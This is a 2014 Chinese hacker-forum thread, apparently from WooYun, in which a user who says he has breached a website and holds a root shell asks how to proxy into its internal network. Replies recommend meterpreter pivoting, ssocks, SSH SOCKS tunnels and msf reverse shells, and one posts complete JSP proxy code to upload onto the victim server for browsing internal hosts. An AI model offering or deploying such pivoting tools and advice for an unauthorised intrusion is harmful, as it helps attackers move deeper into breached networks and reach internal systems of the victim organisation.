疯子求助-梧桐雨解答的jsp proxy

关于linux shell 内网如何做代理

踩(0)
顶(14)
疯子 (世人笑我太疯癫，我笑世人看不穿。)


|
2014-05-30 20:24

最近渗透一个网站 拿到一个shell root权限 已提权

现在想渗透内网 想做一个代理并且扫描内网 可是一直找不到怎么做内网代理 求个好方法 谢谢 ！

有好方法的或者成功的 WB 感谢！
取消收藏感谢(1)
分享到：

1

24 个回复





1# 感谢(1)

梧桐雨

(‮ofni.uygnotuw‮)


|
2014-05-30 20:29

如果想漫游内网的话 在服务器上弄个sock5代理就好了。

参考例子：
http://zone.wooyun.org/content/1693
linux基本上支持python的，只要支持，那么可以试试80vul的 python socks5代理。客户端推荐用：Proxycap

如果是php，就很简单了，很多代理可扫描内网的。百度一下就有许多，结合自己实际情况改改就可以用了。





2#
梧桐雨

(‮ofni.uygnotuw‮)


|
2014-05-30 20:31

80vul 的 socks5代理用法 python 文件名 你想要开的端口

例子 : python socks5.py 9999





3#
疯子 (世人笑我太疯癫，我笑世人看不穿。)

|
2014-05-30 20:37

@梧桐雨 每次都是妹子你来帮我，都不知道怎么说了，小小的1WB不成敬意！





4#
xiaoL (http://www.xlixli.net)

|
2014-05-30 20:37

@梧桐雨

梧桐雨什么的最有爱了





5# 感谢(1)

疯子 (世人笑我太疯癫，我笑世人看不穿。)

|
2014-05-30 20:38

还有好的想法的 小伙伴们也共享出来 我们一起漫游内网！





6#
疯子 (世人笑我太疯癫，我笑世人看不穿。)

|
2014-05-30 20:39

@梧桐雨 恩 我这个是JAVA的tomcat jsp 所以我试一下80vul的 谢谢！





7#
梧桐雨

(‮ofni.uygnotuw‮)


|
2014-05-30 20:43

@疯子 jsp一个很简单的proxy，只要用力把它甩到目标服务器上，然后这么访问：proxy.jsp?http://10.0.10.10 就可以进行漫游了，不过有些内部资源可能加载不出来。

<%@page session="false"%>

<%@page import="java.net.*,java.io.*" %>

<%

try {

String reqUrl = request.getQueryString();

URL url = new URL(reqUrl);

HttpURLConnection con = (HttpURLConnection)url.openConnection();

con.setDoOutput(true);

con.setRequestMethod(request.getMethod());

int clength = request.getContentLength();

if(clength > 0) {

con.setDoInput(true);

byte[] idata = new byte[clength];

request.getInputStream().read(idata, 0, clength);

con.getOutputStream().write(idata, 0, clength);

}

response.setContentType(con.getContentType());

BufferedReader rd = new BufferedReader(new InputStreamReader(con.getInputStream()));

String line;

while ((line = rd.readLine()) != null) {

out.println(line);

}

rd.close();

} catch(Exception e) {

response.setStatus(500);

}

%>

把上面的代码保存成jsp就可以了。





8#
疯子 (世人笑我太疯癫，我笑世人看不穿。)

|
2014-05-30 20:45

@梧桐雨 好的 我主要还是要做扫描 所以还是用socks5 谢谢！





9#
冷冷的夜 (1)

|
2014-05-30 21:35

meterpreter





10#
DM_ (http://x0day.me)

|
2014-05-30 22:39

meta_ssh





11#
Kuuki

|
2014-05-30 22:43

@疯子 丢一个ssocks-0.0.14.tar.gz进去 之前用过 感觉不错





12#
laterain

|
2014-05-30 23:00

ssh 做socks4代理，稳定，不漏气

没有破解密码吗？请移步http://drops.wooyun.org/tips/1951





13#
疯子 (世人笑我太疯癫，我笑世人看不穿。)

|
2014-05-30 23:24

@Kuuki 刚刚用了 发现存在一个问题 我是路由器上网的 ssocks 无法代理到我的内网 端口映射也不行 不知什么问题





14#
wefgod (求大牛指点)

|
2014-05-30 23:44

@laterain 洞主说的是内网。





15#
Kuuki

|
2014-05-31 00:00

@疯子 应该没问题。我当时也是路由上网，我还是映射到我虚拟机里呢，你把dmz那些关了，只开端口映射





16#
乌帽子 (业精于勤而荒于嬉，行成于思而毁于随。)

|
2014-05-31 00:53

meterpreter+povit+socks4





17#
Sct7p (.)V(.) (.)_(.) (.)*(.) (.)^(.) (|)（and 1=2）(|) (.)^(.) (.)*(.) (.)_(.) (.)V(.)


|
2014-05-31 02:32

SSH





18#
Xser (一枚屌丝)

|
2014-05-31 07:29

用msf直接生成一个shell，然后反弹就是了





19#
saline (碧池就是碧池)

|
2014-05-31 11:27

meterpreter不是应该很好的选择么。





20#
debug

|
2014-05-31 15:30

假如拿到的服务器内网 那就用的反向代理 拿到是外网就正向的代理 socket5 msf都可以的，





21#
BlAck.Eagle

|
2014-06-03 23:37

你没感觉代理好卡？





22#
煦阳。

|
2014-06-04 02:00

如果可以直接ssh的话..　putty直接就可以代理的.

我是说如果可以直接ssh的。





23#
gerfalke

|
2014-06-07 12:09

ssocks这个工具挺好用的，可以正向也可以反弹的





24#
小森森 (学习中……)

|
2014-06-07 13:54

ssh啊。。。

ssh -D 1080 host

在本机开一个1080的socks5，通过ssh隧道代理